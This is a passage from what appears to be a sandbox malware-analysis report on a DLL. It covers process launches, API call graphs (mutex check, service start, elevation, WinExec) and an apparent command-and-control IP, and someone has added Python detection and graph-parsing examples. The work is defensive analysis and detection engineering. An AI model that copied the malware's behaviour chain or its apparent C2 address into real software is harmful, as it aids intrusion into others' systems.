                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:15
                                                        Start time:08:18:46
                                                        Start date:18/11/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff75da10000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:16
                                                        Start time:08:18:46
                                                        Start date:18/11/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff7b4ee0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:17
                                                        Start time:08:18:46
                                                        Start date:18/11/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff75da10000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:18
                                                        Start time:08:18:46
                                                        Start date:18/11/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff75da10000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true
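
The process list above shows loaddll32 and rundll32 invoking the DLL through both its Shellex export and ordinal #1, followed by four identical `cmd /c md C:\Users\Public\Documents\MM` children, which is the behaviour behind the "Windows Shell/Scripting Application File Write to Suspicious Folder" Sigma match in the summary. As an added example, not taken from the report or from the Sigma rule itself, the Python below runs a simplified version of that check over process-creation events reconstructed from the list (target IDs 5 and 8 to 15), plus a second check for rundll32 being handed a DLL path under a user profile. The event field names, the write-verb list and the suspicious-folder list are my own assumptions.

```python
import re
from collections import defaultdict

# Process-creation events reconstructed from the report's process list.
# The field layout (id/image/cmdline) is mine, not Joe Sandbox's.
EVENTS = [
    {"id": 5,  "image": r"C:\Windows\System32\loaddll32.exe",
     "cmdline": r'loaddll32.exe "C:\Users\user\Desktop\l10U7QN0CY.dll"'},
    {"id": 8,  "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": r'cmd.exe /C rundll32.exe "C:\Users\user\Desktop\l10U7QN0CY.dll",#1'},
    {"id": 9,  "image": r"C:\Windows\SysWOW64\rundll32.exe",
     "cmdline": r"rundll32.exe C:\Users\user\Desktop\l10U7QN0CY.dll,Shellex"},
    {"id": 10, "image": r"C:\Windows\SysWOW64\rundll32.exe",
     "cmdline": r'rundll32.exe "C:\Users\user\Desktop\l10U7QN0CY.dll",#1'},
    {"id": 11, "image": r"C:\Windows\SysWOW64\cmd.exe", "cmdline": r"cmd /c md C:\Users\Public\Documents\MM"},
    {"id": 12, "image": r"C:\Windows\SysWOW64\cmd.exe", "cmdline": r"cmd /c md C:\Users\Public\Documents\MM"},
    {"id": 13, "image": r"C:\Windows\SysWOW64\cmd.exe", "cmdline": r"cmd /c md C:\Users\Public\Documents\MM"},
    {"id": 14, "image": r"C:\Windows\SysWOW64\cmd.exe", "cmdline": r"cmd /c md C:\Users\Public\Documents\MM"},
    {"id": 15, "image": r"C:\Windows\System32\conhost.exe",
     "cmdline": r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"},
]

# Shell/scripting hosts whose command lines are inspected (lowercase path suffixes).
SHELL_IMAGES = ("\\cmd.exe", "\\powershell.exe", "\\pwsh.exe", "\\wscript.exe", "\\cscript.exe")

# Built-in verbs that create directories or write files, and world-writable folders
# commonly used for staging. Both lists are illustrative assumptions, not exhaustive.
WRITE_VERBS = r"\b(?:md|mkdir|copy|xcopy|move|echo|type)\b"
SUSPICIOUS_DIRS = (r"[A-Za-z]:\\Users\\Public\\", r"[A-Za-z]:\\ProgramData\\",
                   r"[A-Za-z]:\\Windows\\Temp\\", r"[A-Za-z]:\\Temp\\")
WRITE_TO_SUSPICIOUS = re.compile(
    WRITE_VERBS + r".*?((?:" + "|".join(SUSPICIOUS_DIRS) + r")[^\s\"]*)", re.IGNORECASE)

# A DLL path inside a user profile (anything under C:\Users\<name>\ other than Public).
USER_PROFILE_PATH = re.compile(r"[A-Za-z]:\\Users\\(?!Public\\)[^\\\s\"]+\\", re.IGNORECASE)


def is_shell(image):
    return image.lower().endswith(SHELL_IMAGES)


def shell_writes_to_suspicious_folder(events):
    """Return {target_path: [event ids]} for shell processes creating/writing under a suspicious folder.
    Grouping by target path makes repeated staging (the four identical cmd children here) visible."""
    hits = defaultdict(list)
    for ev in events:
        if not is_shell(ev["image"]):
            continue
        m = WRITE_TO_SUSPICIOUS.search(ev["cmdline"])
        if m:
            hits[m.group(1)].append(ev["id"])
    return dict(hits)


def rundll32_loading_from_user_profile(events):
    """Event ids where rundll32.exe is given a DLL located under a user profile directory."""
    return [ev["id"] for ev in events
            if ev["image"].lower().endswith("\\rundll32.exe")
            and USER_PROFILE_PATH.search(ev["cmdline"])]


if __name__ == "__main__":
    print(shell_writes_to_suspicious_folder(EVENTS))
    print(rundll32_loading_from_user_profile(EVENTS))
```

The sandbox launched the DLL itself, so the rundll32 hit is expected here; on an endpoint the same pattern (rundll32 loading a DLL from a user's Desktop by export name) is the line a detection engineer would actually alert on, with the `C:\Users\Public` directory creation as corroboration.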


                                                          Execution Graph

                                                          Execution Coverage:1%
                                                          Dynamic/Decrypted Code Coverage:0%
                                                          Signature Coverage:50%
                                                          Total number of Nodes:244
                                                          Total number of Limit Nodes:11
                                                          execution_graph 21793 1001efd0 12 API calls 21874 1001b660 GetModuleHandleA 21793->21874 21795 1001f1d6 21796 1001b660 3 API calls 21795->21796 21797 1001f258 21796->21797 21798 1001b660 3 API calls 21797->21798 21799 1001f2c9 21798->21799 21800 1001b660 3 API calls 21799->21800 21801 1001f3ed 21800->21801 21802 1001b660 3 API calls 21801->21802 21803 1001f54e 21802->21803 21804 1001b660 3 API calls 21803->21804 21805 1001f67b 21804->21805 21806 1001b660 3 API calls 21805->21806 21807 1001f729 21806->21807 21808 1001b660 3 API calls 21807->21808 21809 1001f7c3 21808->21809 21810 1001b660 3 API calls 21809->21810 21811 1001f80d 21810->21811 21812 1001b660 3 API calls 21811->21812 21813 1001f893 21812->21813 21814 1001b660 3 API calls 21813->21814 21815 1001f93e GetCurrentThreadId PostThreadMessageA 21814->21815 21816 1001f959 InitializeSecurityDescriptor SetSecurityDescriptorDacl GetCommandLineA CreateMutexA 21815->21816 21818 1001fa63 21816->21818 21819 1001fa52 GetLastError 21816->21819 21821 1001fe86 21818->21821 21822 1001fadf 21818->21822 21819->21818 21820 1001fec6 21819->21820 21878 1001ab20 21821->21878 21824 1001fc40 21822->21824 21825 1001faeb strstr 21822->21825 21824->21820 21827 1001fc4c 21824->21827 21828 1001fb07 Sleep 21825->21828 21829 1001fb18 21825->21829 21826 1001fea1 21832 1001feb5 Sleep 21826->21832 21833 1001fea8 21826->21833 21893 1001e440 15 API calls 21827->21893 21835 1001ef90 24 API calls 21828->21835 21888 1001fee0 OpenSCManagerA OpenServiceA CloseServiceHandle CloseServiceHandle CloseServiceHandle 21829->21888 21885 1001ef90 21832->21885 21896 1001e440 15 API calls 21833->21896 21835->21828 21836 1001fb22 21840 1001fbb6 sprintf 21836->21840 21841 1001fb2d 21836->21841 21839 1001fc5f 21839->21820 21845 1001fc98 sprintf 21839->21845 21890 1001e440 15 API calls 21840->21890 21848 1001fb52 OpenSCManagerA 21841->21848 21849 1001fba5 Sleep 21841->21849 21842 1001feb2 21842->21832 
21851 1001fd01 21845->21851 21846 1001fc15 21891 1001ff30 9 API calls 21846->21891 21848->21849 21853 1001fb65 OpenServiceA 21848->21853 21854 1001ef90 24 API calls 21849->21854 21855 1001fe75 Sleep 21851->21855 21856 1001fd0a GetModuleFileNameA sprintf 21851->21856 21852 1001fc31 21892 1001ea60 9 API calls 21852->21892 21858 1001fba2 CloseServiceHandle 21853->21858 21859 1001fb7f StartServiceA 21853->21859 21854->21849 21864 1001ef90 24 API calls 21855->21864 21865 1001fdbc Sleep 21856->21865 21858->21849 21862 1001fba0 CloseServiceHandle 21859->21862 21863 1001fb8d CloseServiceHandle CloseServiceHandle 21859->21863 21861 1001fc39 ExitProcess 21862->21858 21889 1001ea60 9 API calls 21863->21889 21864->21855 21868 1001fe12 21865->21868 21867 1001fb99 ExitProcess 21894 1001e800 GetModuleHandleA LoadLibraryA GetProcAddress CloseHandle 21868->21894 21870 1001fe2d sprintf 21871 1001fe69 21870->21871 21895 1001ea60 9 API calls 21871->21895 21873 1001fe6e ExitProcess 21875 1001b670 LoadLibraryA 21874->21875 21876 1001b67b GetProcAddress 21874->21876 21875->21876 21877 1001b689 21875->21877 21876->21795 21877->21795 21897 10014700 LoadLibraryA GetProcAddress #823 #823 RegOpenKeyExA 21878->21897 21880 1001abc8 lstrlenA 21881 1001ac37 lstrlenA 21880->21881 21882 1001abd6 CreateFileA 21880->21882 21881->21826 21883 1001ac30 CloseHandle 21882->21883 21884 1001ac17 GetFileSize ReadFile 21882->21884 21883->21881 21884->21883 21925 1002bdb0 LoadLibraryA GetProcAddress 21885->21925 21887 1001efa7 WaitForSingleObject CloseHandle 21887->21832 21888->21836 21889->21867 21890->21846 21891->21852 21892->21861 21893->21839 21894->21870 21895->21873 21896->21842 21898 10014881 21897->21898 21899 10014899 21897->21899 21923 10014c12 RegCloseKey RegCloseKey 21898->21923 21902 10014a03 RegQueryValueExA 21899->21902 21903 100148c2 RegQueryValueExA 21899->21903 21904 10014ba2 wsprintfA 21899->21904 21905 10014908 RegQueryValueExA 21899->21905 21906 10014acc RegEnumValueA 21899->21906 21907 
10014a30 RegEnumKeyExA 21899->21907 21908 10014bf5 lstrcatA 21899->21908 21909 10014bcf wsprintfA 21899->21909 21910 10014b58 wsprintfA 21899->21910 21911 10014b7d wsprintfA 21899->21911 21912 100149bc RegQueryValueExA 21899->21912 21919 100148ac 21899->21919 21921 100148f2 21899->21921 21902->21921 21903->21921 21904->21908 21920 10014934 21905->21920 21905->21921 21916 10014b44 21906->21916 21906->21921 21915 10014a78 wsprintfA 21907->21915 21907->21921 21908->21880 21909->21908 21910->21908 21911->21908 21914 100149e8 wsprintfA 21912->21914 21912->21921 21913 10014894 #825 #825 21913->21880 21914->21921 21915->21907 21916->21904 21916->21908 21916->21909 21916->21910 21916->21911 21919->21902 21919->21903 21919->21904 21919->21905 21919->21908 21919->21909 21919->21910 21919->21911 21919->21912 21919->21921 21920->21921 21922 1001494e strncat strncat strchr 21920->21922 21924 10014c12 RegCloseKey RegCloseKey 21921->21924 21922->21920 21923->21913 21924->21913 21926 1002bdf3 CreateThread LoadLibraryA GetProcAddress 21925->21926 21927 1002be35 CloseHandle 21926->21927 21928 1002bcb0 21926->21928 21927->21887 21934 10010ca0 21928->21934 21930 1002bcee LoadLibraryA GetProcAddress 21931 1002bd5e 21930->21931 21932 1002bd69 21931->21932 21935 1002bfa0 14 API calls 21931->21935 21934->21930 21935->21932 21936 1002d2eb 21937 1002d2fe 21936->21937 21942 1002d307 21936->21942 21939 1002d32f 21937->21939 21951 100214b0 21937->21951 21938 1002d323 21965 1002d240 malloc _initterm free 21938->21965 21942->21937 21942->21938 21942->21939 21943 1002d32b 21943->21937 21945 1002d34f 21945->21939 21946 1002d358 21945->21946 21967 1002d240 malloc _initterm free 21946->21967 21947 1002d347 21966 1002d240 malloc _initterm free 21947->21966 21950 1002d360 21950->21939 21952 10021588 21951->21952 21953 100214be 21951->21953 21952->21939 21952->21945 21952->21947 21968 10021410 _access 21953->21968 21955 100214c3 _access 21956 100214e0 WinExec _access 21955->21956 21957 10021521 Sleep 
21955->21957 21956->21957 21958 10021500 WinExec Sleep _access 21956->21958 21991 10020f70 21957->21991 21958->21957 21958->21958 21960 1002152d CreateThread 21961 10021551 CreateThread 21960->21961 21962 1002154e CloseHandle 21960->21962 22075 10020fd0 96 API calls 21960->22075 21963 10021566 CloseHandle 21961->21963 21964 10021569 Shellex 21961->21964 22074 100211c0 41 API calls 21961->22074 21962->21961 21963->21964 21964->21952 21965->21943 21966->21945 21967->21950 21969 10021434 21968->21969 21970 1002142b 21968->21970 21969->21955 21996 100209d0 AllocateAndInitializeSid 21970->21996 21973 1002143d GetModuleFileNameA 21973->21969 21974 10021453 21973->21974 21975 1002145b ShellExecuteExA 21974->21975 21976 10021497 GetLastError 21975->21976 21977 1002149f exit 21975->21977 21976->21975 21978 100214b0 21977->21978 21979 10021588 21978->21979 21980 10021410 123 API calls 21978->21980 21979->21955 21981 100214c3 _access 21980->21981 21982 100214e0 WinExec _access 21981->21982 21983 10021521 Sleep 21981->21983 21982->21983 21984 10021500 WinExec Sleep _access 21982->21984 21985 10020f70 8 API calls 21983->21985 21984->21983 21984->21984 21986 1002152d CreateThread 21985->21986 21987 10021551 CreateThread 21986->21987 21988 1002154e CloseHandle 21986->21988 22022 10020fd0 _access 21986->22022 21989 10021566 CloseHandle 21987->21989 21990 10021569 Shellex 21987->21990 21999 100211c0 _access 21987->21999 21988->21987 21989->21990 21990->21979 22071 10020f30 GetModuleFileNameA 21991->22071 21993 10020f7a 21994 10020f81 ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD ?endl@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@1@AAV21@ 21993->21994 21995 10020f9f GetLastError ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@K ?endl@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@1@AAV21@ 21993->21995 21994->21960 21995->21960 21997 10020a36 21996->21997 21998 10020a1a 
CheckTokenMembership FreeSid 21996->21998 21997->21969 21997->21973 21998->21997 22000 100212e1 Sleep CreateFileA 21999->22000 22001 100211f8 ?_Grow@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAE_NI_N 21999->22001 22002 10021310 MessageBoxA 22000->22002 22003 10021327 GetFileSize 22000->22003 22004 10021228 ?_Eos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXI 22001->22004 22005 1002124c ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI 22001->22005 22007 100213f0 22002->22007 22008 10021335 MessageBoxA 22003->22008 22009 1002134e VirtualAlloc 22003->22009 22004->22005 22067 10020810 22 API calls 22005->22067 22010 100213e9 CloseHandle 22008->22010 22011 10021369 MessageBoxA 22009->22011 22012 1002137d ReadFile 22009->22012 22010->22007 22011->22010 22014 100213c7 MessageBoxA VirtualFree 22012->22014 22015 1002138e 22012->22015 22013 1002128d 22016 100212a5 22013->22016 22018 100212ab #825 22013->22018 22014->22010 22015->22014 22017 10021393 CloseHandle 22015->22017 22016->22000 22019 100212d8 #825 22016->22019 22021 100212d2 22016->22021 22020 100213a0 VirtualFree 22017->22020 22018->22016 22019->22000 22021->22000 22023 10021123 22022->22023 22024 10021009 ?_Grow@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAE_NI_N 22022->22024 22025 100209d0 3 API calls 22023->22025 22026 10021063 ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI 22024->22026 22027 1002103f ?_Eos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXI 22024->22027 22028 10021128 22025->22028 22068 10020810 22 API calls 22026->22068 22027->22026 22030 1002114e GetModuleFileNameA 22028->22030 22031 1002112c 22028->22031 22032 10021163 22030->22032 22033 10021131 22030->22033 22069 10020c20 41 API calls 22031->22069 22038 1002116e ShellExecuteExA 22032->22038 22035 100210b4 22036 100210cd 22035->22036 22037 100210d3 #825 22035->22037 22039 10021118 Sleep 22036->22039 
22042 1002110f #825 22036->22042 22044 10021109 22036->22044 22037->22036 22040 100211a6 GetLastError 22038->22040 22041 100211ae exit 22038->22041 22039->22023 22040->22038 22043 100211c0 _access 22041->22043 22042->22039 22045 100212e1 Sleep CreateFileA 22043->22045 22046 100211f8 ?_Grow@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAE_NI_N 22043->22046 22044->22039 22047 10021310 MessageBoxA 22045->22047 22048 10021327 GetFileSize 22045->22048 22049 10021228 ?_Eos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXI 22046->22049 22050 1002124c ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI 22046->22050 22052 100213f0 22047->22052 22053 10021335 MessageBoxA 22048->22053 22054 1002134e VirtualAlloc 22048->22054 22049->22050 22070 10020810 22 API calls 22050->22070 22055 100213e9 CloseHandle 22053->22055 22056 10021369 MessageBoxA 22054->22056 22057 1002137d ReadFile 22054->22057 22055->22052 22056->22055 22058 100213c7 MessageBoxA VirtualFree 22057->22058 22059 1002138e 22057->22059 22058->22055 22059->22058 22061 10021393 CloseHandle 22059->22061 22060 100212a5 22060->22045 22064 100212d8 #825 22060->22064 22066 100212d2 22060->22066 22065 100213a0 VirtualFree 22061->22065 22062 1002128d 22062->22060 22063 100212ab #825 22062->22063 22063->22060 22064->22045 22066->22045 22067->22013 22068->22035 22069->22033 22070->22062 22072 10020f53 CopyFileA 22071->22072 22073 10020f4c 22071->22073 22072->21993 22073->21993
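
The execution graph above is a flat token stream: a node is `<id> <address> <API names...>`, where `<n> API calls` stands for a subcall the graph collapses at that node, and an edge is `<id>-><id>`. Read along its edges it shows the path the "evasive API chain" signature refers to: from the Shellex entry at 1001efd0, through the resolver at 1001b660 (GetModuleHandleA/LoadLibraryA/GetProcAddress), to CreateMutexA followed by a GetLastError branch, then strstr on the command line and OpenSCManagerA/OpenServiceA/StartServiceA before ExitProcess. The Python below is an added example, not part of the Joe Sandbox report or its tooling: it parses that format and walks the graph to recover API sequences. The excerpt it works on is copied verbatim from the graph above but drops nodes and edges that are not on that path; node ids and addresses are the report's own.

```python
import re
from collections import defaultdict, deque

NODE_ID = re.compile(r"^\d{5}$")          # node ids in the graph are five-digit integers
ADDR = re.compile(r"^[0-9a-f]{8}$")       # 32-bit code address as the report prints it
EDGE = re.compile(r"^(\d{5})->(\d{5})$")  # edge between two node ids

# Excerpt of the report's execution graph: resolver node, mutex check, service start, exit.
GRAPH_EXCERPT = """
21814 1001b660 3 API calls 21813->21814
21815 1001f93e GetCurrentThreadId PostThreadMessageA 21814->21815
21816 1001f959 InitializeSecurityDescriptor SetSecurityDescriptorDacl GetCommandLineA CreateMutexA 21815->21816
21818 1001fa63 21816->21818 21819 1001fa52 GetLastError 21816->21819
21821 1001fe86 21818->21821 21822 1001fadf 21818->21822 21819->21818 21820 1001fec6 21819->21820
21824 1001fc40 21822->21824 21825 1001faeb strstr 21822->21825
21828 1001fb07 Sleep 21825->21828 21829 1001fb18 21825->21829
21888 1001fee0 OpenSCManagerA OpenServiceA CloseServiceHandle CloseServiceHandle CloseServiceHandle 21829->21888 21888->21836
21836 1001fb22 21841 1001fb2d 21836->21841
21848 1001fb52 OpenSCManagerA 21841->21848 21849 1001fba5 Sleep 21841->21849
21853 1001fb65 OpenServiceA 21848->21853
21859 1001fb7f StartServiceA 21853->21859
21863 1001fb8d CloseServiceHandle CloseServiceHandle 21859->21863
21889 1001ea60 9 API calls 21863->21889
21867 1001fb99 ExitProcess 21889->21867
"""


def parse_execution_graph(text):
    """Return (nodes, edges): nodes[id] = {"addr", "apis", "summary"}, edges[id] = [successor ids]."""
    nodes, edges, current = {}, defaultdict(list), None
    tokens = text.split()
    i = 0
    while i < len(tokens):
        tok = tokens[i]
        m = EDGE.match(tok)
        if m:
            edges[m.group(1)].append(m.group(2))
            i += 1
        elif NODE_ID.match(tok) and i + 1 < len(tokens) and ADDR.match(tokens[i + 1]):
            current = tok
            nodes[current] = {"addr": tokens[i + 1], "apis": [], "summary": None}
            i += 2
        elif tok.isdigit() and tokens[i + 1:i + 3] == ["API", "calls"]:
            # "<n> API calls": a collapsed subcall, recorded as a count rather than as API names
            if current is not None:
                nodes[current]["summary"] = int(tok)
            i += 3
        else:
            if current is not None:          # any other token is an API name at the current node
                nodes[current]["apis"].append(tok)
            i += 1
    return nodes, dict(edges)


def find_api_path(nodes, edges, start, target_api):
    """Shortest path (fewest nodes) from `start` to the first node calling `target_api`, or None."""
    prev, queue = {start: None}, deque([start])
    while queue:
        nid = queue.popleft()
        if target_api in nodes.get(nid, {}).get("apis", []):
            path = []
            while nid is not None:
                path.append(nid)
                nid = prev[nid]
            return path[::-1]
        for nxt in edges.get(nid, []):
            if nxt not in prev:
                prev[nxt] = nid
                queue.append(nxt)
    return None


def apis_along(nodes, path):
    """API names encountered on a node path, in execution order (collapsed subcalls excluded)."""
    return [api for nid in path for api in nodes.get(nid, {}).get("apis", [])]


def successor_apis(nodes, edges, api):
    """For every node calling `api`, the APIs of each direct successor: shows what a call is checked by."""
    return {nid: {nxt: nodes.get(nxt, {"apis": []})["apis"] for nxt in edges.get(nid, [])}
            for nid, node in nodes.items() if api in node["apis"]}


if __name__ == "__main__":
    nodes, edges = parse_execution_graph(GRAPH_EXCERPT)
    path = find_api_path(nodes, edges, "21814", "ExitProcess")
    print(" -> ".join(apis_along(nodes, path)))
    print(successor_apis(nodes, edges, "CreateMutexA"))
```

`successor_apis` on CreateMutexA is the quick way to confirm the mutex guard: one successor node calls GetLastError, the other goes straight on, which is the ERROR_ALREADY_EXISTS check that lets a second instance bail out. The same parser runs on the full `execution_graph ...` line from the report, where the entry node is 21793 at 1001efd0.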

                                                          Control-flow Graph

                                                          control_flow_graph 0 1001efd0-1001fa50 #823 lstrcpyA * 11 call 1001b660 * 11 GetCurrentThreadId PostThreadMessageA InitializeSecurityDescriptor SetSecurityDescriptorDacl GetCommandLineA CreateMutexA 25 1001fa63-1001faba 0->25 26 1001fa52-1001fa5d GetLastError 0->26 29 1001fad0-1001fad9 25->29 30 1001fabc-1001faca 25->30 26->25 27 1001fec6-1001fed2 26->27 31 1001fe86-1001fea6 call 1001ab20 29->31 32 1001fadf-1001fae5 29->32 30->29 42 1001feb5 31->42 43 1001fea8-1001feb2 call 1001e440 31->43 34 1001fc40-1001fc46 32->34 35 1001faeb-1001fb05 strstr 32->35 34->27 37 1001fc4c-1001fc92 call 1001e440 34->37 38 1001fb07 35->38 39 1001fb18-1001fb27 call 1001fee0 35->39 37->27 58 1001fc98-1001fd04 sprintf 37->58 40 1001fb0d-1001fb16 Sleep call 1001ef90 38->40 51 1001fbb6-1001fc3a sprintf call 1001e440 call 1001ff30 call 1001ea60 ExitProcess 39->51 52 1001fb2d-1001fb50 39->52 48 1001febb-1001febf Sleep call 1001ef90 42->48 43->42 57 1001fec4 48->57 62 1001fb52-1001fb63 OpenSCManagerA 52->62 63 1001fba5 52->63 57->48 69 1001fe75 58->69 70 1001fd0a-1001fe6f GetModuleFileNameA sprintf Sleep call 1001e800 sprintf call 1001ea60 ExitProcess 58->70 62->63 67 1001fb65-1001fb7d OpenServiceA 62->67 64 1001fbab-1001fbb4 Sleep call 1001ef90 63->64 72 1001fba2-1001fba3 CloseServiceHandle 67->72 73 1001fb7f-1001fb8b StartServiceA 67->73 74 1001fe7b-1001fe84 Sleep call 1001ef90 69->74 72->63 77 1001fba0 CloseServiceHandle 73->77 78 1001fb8d-1001fb9a CloseServiceHandle * 2 call 1001ea60 ExitProcess 73->78 77->72
                                                          APIs
                                                          • #823.MFC42(00000849), ref: 1001EFDF
                                                          • lstrcpyA.KERNEL32(27.124.13.32,00000000), ref: 1001F006
                                                          • lstrcpyA.KERNEL32(1011EAFC,0000012C), ref: 1001F014
                                                          • lstrcpyA.KERNEL32(Default,00000260), ref: 1001F022
                                                          • lstrcpyA.KERNEL32(1.0,00000292), ref: 1001F030
                                                          • lstrcpyA.KERNEL32(1011EC82,000002B2), ref: 1001F03E
                                                          • lstrcpyA.KERNEL32(1011ECE6,00000316), ref: 1001F04C
                                                          • lstrcpyA.KERNEL32(1011ED66,00000396), ref: 1001F05A
                                                          • lstrcpyA.KERNEL32(1011EE66,00000496), ref: 1001F068
                                                          • lstrcpyA.KERNEL32(1011EF78,000005A8), ref: 1001F076
                                                          • lstrcpyA.KERNEL32(1011EFDC,0000060C), ref: 1001F084
                                                          • lstrcpyA.KERNEL32(1011F018,00000648), ref: 1001F092
                                                            • Part of subcall function 1001B660: GetModuleHandleA.KERNEL32(?,771A83C0,1001F1D6), ref: 1001B666
                                                            • Part of subcall function 1001B660: LoadLibraryA.KERNEL32(?), ref: 1001B671
                                                            • Part of subcall function 1001B660: GetProcAddress.KERNEL32(00000000,?), ref: 1001B681
                                                          • GetCurrentThreadId.KERNEL32 ref: 1001F94E
                                                          • PostThreadMessageA.USER32(00000000,?,?,?,?,?,?), ref: 1001F955
                                                          • InitializeSecurityDescriptor.ADVAPI32(?,00000001,?,?,?,?,?,?), ref: 1001F973
                                                          • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,00000000,00000000,?,?,?,?,?,?), ref: 1001F987
                                                          • GetCommandLineA.KERNEL32 ref: 1001F9B1
                                                          • CreateMutexA.KERNELBASE(?,00000000,00000000), ref: 1001FA43
                                                          • GetLastError.KERNEL32 ref: 1001FA52
                                                          • strstr.MSVCRT ref: 1001FAFA
                                                          • Sleep.KERNEL32(00000032,?,?,?,?,?,?,?,?), ref: 1001FB0F
                                                          • OpenSCManagerA.ADVAPI32(00000000,00000000,00020000), ref: 1001FB59
                                                          • OpenServiceA.ADVAPI32(00000000,1011EC82,00000010), ref: 1001FB6D
                                                          • StartServiceA.ADVAPI32(00000000,00000000,00000000), ref: 1001FB82
                                                          • CloseServiceHandle.ADVAPI32(00000000), ref: 1001FB8F
                                                          • CloseServiceHandle.ADVAPI32(00000000), ref: 1001FB92
                                                          • ExitProcess.KERNEL32 ref: 1001FB9A
                                                          • CloseServiceHandle.ADVAPI32(00000000), ref: 1001FBA0
                                                          • CloseServiceHandle.ADVAPI32(00000000), ref: 1001FBA3
                                                          • ExitProcess.KERNEL32 ref: 1001FC3A
                                                          • sprintf.MSVCRT ref: 1001FC05
                                                            • Part of subcall function 1001E440: CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000004,00000080,00000000,1011EF78,00000000,0000005C), ref: 1001E484
                                                            • Part of subcall function 1001E440: GetLocalTime.KERNEL32(?), ref: 1001E4CE
                                                            • Part of subcall function 1001E440: sprintf.MSVCRT ref: 1001E599
                                                          • Sleep.KERNEL32(00000032), ref: 1001FBAD
                                                            • Part of subcall function 1001EF90: WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,?,771B0F00,1001FEC4), ref: 1001EFAF
                                                            • Part of subcall function 1001EF90: CloseHandle.KERNEL32(00000000,?,?,?,?,?,771B0F00,1001FEC4,?,?,?,?,?,?,?,?), ref: 1001EFB6
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: lstrcpy$HandleService$Close$CreateDescriptorExitOpenProcessSecuritySleepThreadsprintf$#823AddressCommandCurrentDaclErrorFileInitializeLastLibraryLineLoadLocalManagerMessageModuleMutexObjectPostProcSingleStartTimeWaitstrstr
